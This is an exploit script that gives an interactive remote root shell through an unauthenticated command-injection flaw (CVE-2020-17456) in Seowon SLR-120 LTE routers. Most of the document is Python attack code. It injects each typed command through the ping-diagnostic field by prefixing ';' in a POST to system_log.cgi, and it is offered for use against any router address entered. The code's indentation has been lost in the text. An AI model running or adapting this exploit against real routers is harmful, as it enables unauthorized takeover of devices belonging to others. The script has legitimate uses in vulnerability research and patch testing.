# Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)
# Date: 2022-03-11
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://www.seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30
# Version: All version
# Tested on: Windows 10 Enterprise x64 , Linux
# CVE : CVE-2020-17456
# [ About - Seowon SLR-120 router ]:
#The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile,
#The convenience of sharing wireless internet access invigorates your lifestyle, families,
#friends and workmates. Carry it around to boost your active communication anywhere.
# [ Description ]:
#Execute commands without authentication as admin user ,
#To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user.
# [ Vulnerable products ]:
#SLR-120S42G
#SLR-120D42G
#SLR-120T42G
import requests
print ('''
###########################################################
# Seowon SLR-120S42G router - RCE (Unauthenticated) #
# BY:Aryan Chehreghani #
# Team:TAPESH DIGITAL SECURITY TEAM IRAN #
# mail:aryanchehreghani@yahoo.com #
# -+-USE:python script.py #
# Example Target : http://192.168.1.1:443/ #
###########################################################
''')
url = input ("=> Enter Target : ")
while(True):
try:
cmd = input ("~Enter Command $ ")
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q:0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "207",
"Origin": "http://192.168.1.1",
"Connection": "close",
"Referer": "http://192.168.1.1/",
"Upgrade-Insecure-Requests": "1"
}
datas = {
'Command':'Diagnostic',
'traceMode':'ping',
'reportIpOnly':'',
'pingIpAddr':';'+cmd,
'pingPktSize':'56',
'pingTimeout':'30',
'pingCount':'4',
'maxTTLCnt':'30',
'queriesCnt':'3',
'reportIpOnlyCheckbox':'on',
'logarea':'com.cgi',
'btnApply':'Apply',
'T':'1646950471018'
}
x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas)
print(x.text)
except:
break